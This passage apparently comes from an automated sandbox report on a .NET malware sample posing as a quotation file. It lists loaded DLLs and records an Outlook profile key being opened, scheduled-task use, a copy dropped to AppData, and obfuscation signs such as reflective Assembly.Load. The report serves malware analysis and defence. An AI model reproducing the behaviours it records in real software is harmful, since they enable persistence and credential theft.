                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: loadperf.dll
                Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: ntmarta.dll
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeFile written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                barindex
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, InnerForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: NuDUTBObHpKADz.exe.0.dr, InnerForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, l4lWgpboLH3dw1sHJl.cs.Net Code: YO5PyZWuO8 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, l4lWgpboLH3dw1sHJl.cs.Net Code: YO5PyZWuO8 System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 0_2_0153DB84 pushfd ; ret 0_2_0153DB89
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 0_2_07418918 push esp; iretd 0_2_07418919
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeCode function: 9_2_06DE9241 push es; ret 9_2_06DE9244
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 10_2_0111DB84 pushfd ; ret 10_2_0111DB89
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 10_2_053D0D70 pushfd ; retf 10_2_053D0D7D
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_0269891E pushad ; iretd 14_2_0269891F
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_02698C2F pushfd ; iretd 14_2_02698C30
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeCode function: 14_2_02698DDF push esp; iretd 14_2_02698DE0
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeStatic PE information: section name: .text entropy: 7.5503065152862066
                Source: NuDUTBObHpKADz.exe.0.drStatic PE information: section name: .text entropy: 7.5503065152862066
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, jf4Qf9XFgnwgV28YTi.csHigh entropy of concatenated method names: 'LU7X6yKwwO', 'ISNXK8UhhP', 'lAnNYVD5mk', 'cITN3tObOJ', 'n5mXVkRMfN', 'uyHXRf6GiT', 'OQGXQHsEOu', 'zVlXeyZ2Pr', 'y5yXSYt5pI', 'N8VXpxKA67'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, EXP714sBm2ctecZFQ5.csHigh entropy of concatenated method names: 'hTYuvl4xpZ', 'sKtu5ecsIW', 'FqDuAA9oIZ', 'pXLucgpQL6', 'RYNu9usi7e', 'iNru8fEyeF', 'gBQus4m7dM', 'fa9uHwZDnS', 't1cuGvSYmu', 't17uENLuNW'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, yNnsJdCNHPcY1XMT4rt.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XNkmu7q24b', 'gNxmBtjkrZ', 'R1smaTOOob', 'LaLmmZZcrV', 'A2smwgDiCu', 'EOTmfqKLHX', 'LbLmUk5BJV'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, l4lWgpboLH3dw1sHJl.csHigh entropy of concatenated method names: 'rTwdlcsTgq', 'HyWdoo6g6I', 'yKTdWP9ikF', 'H7xdF0mS7h', 'FYZdg3Wwkf', 'qekdrrnCSx', 'RK9dbyCdGa', 'OLqdh3KEI9', 'JYidObD6cT', 'z7Hd7Ex7S4'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, vfkoEZCFRkJoTb50MAj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OIiBVwsHY5', 'a7hBRF6Y7C', 't2wBQNBWNV', 'APCBe1RjgL', 'KMrBSL5Ecj', 'O9EBpBC8Zw', 'xcBB05MyWo'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, NZGTi0WPFvt2i5LQMG.csHigh entropy of concatenated method names: 'ri2y7SFRe', 'nTtLtuH5s', 'UH7jK2aBj', 'EXRkxhCPh', 'On82QQf23', 'usx4Dg4ga', 'sgvU1JgIDJmVl5YaZH', 'BFu7LaGxdjqHuT5R8D', 'mCaNhwp54', 'dyNB0qmvq'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, dBMNChvaYpUXNoIXaf.csHigh entropy of concatenated method names: 'EYYboTeDi7', 'SwkbFM5Quw', 'rVRbrR03bo', 'NKMrKCAPW4', 'hKlrzIxIYb', 'aRRbY4PAX7', 'EUSb3PLF5i', 'RMHbJP2adb', 'ydmbdDU2jT', 'MIfbPyPB1D'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, mjll2lncEU9TxwTknr.csHigh entropy of concatenated method names: 'nlyM1yS4VI', 'QiXM2rNf0U', 'sS2MvvqiMQ', 'kB7M5cMXUq', 'G3WMcU8rhr', 'tEIM9IxnHI', 'hmNMsO57WX', 'qH2MH88X4l', 'xRJMExZIy5', 'xwMMVM96J0'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, By1IY6fiKcunMsajFa.csHigh entropy of concatenated method names: 'Gn0gZsZYa6', 'UjlgkA48Ww', 'sbdFAl4OtR', 'hGmFcv6Anq', 'lNlF9IpO7O', 'zxlF8qP1ns', 'y4yFsbD2ox', 'AXmFH6SISU', 'y5gFGRFD4w', 'SJdFEmoMOL'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, YChN0VCCf5YB3QfasmB.csHigh entropy of concatenated method names: 'jrDBKbxL56', 'NWmBz3tsCr', 'iBOaYDGYWt', 'bf8a3g8NES', 'gyEaJHsYIt', 'UW0adblTAv', 'DRtaP38MVY', 'B5ZalWiOFD', 'hZOaocUkO7', 'v51aWjGYF2'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, gAaOnDG3SbsRr2mZsZ.csHigh entropy of concatenated method names: 'Dispose', 'd8J3ISldek', 'gdIJ5YU2vT', 'rBmmiUHWfk', 'v563KI3Q0J', 'SCl3zEgFXl', 'ProcessDialogKey', 'jWqJYqZSjK', 'vyBJ3s2dAV', 'XiPJJEOxB9'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, Lv1bZR1o53kqNJhWi9.csHigh entropy of concatenated method names: 'I1irl7ttmn', 'OYnrWTXYTC', 'wvSrg7WJae', 'ysfrbfYN8p', 'QVArhCZppW', 'q1WgifatSk', 'gJPgnxHaiU', 'lQngD3LSdm', 'F5yg6d1kfE', 'JLvgIyDFcn'
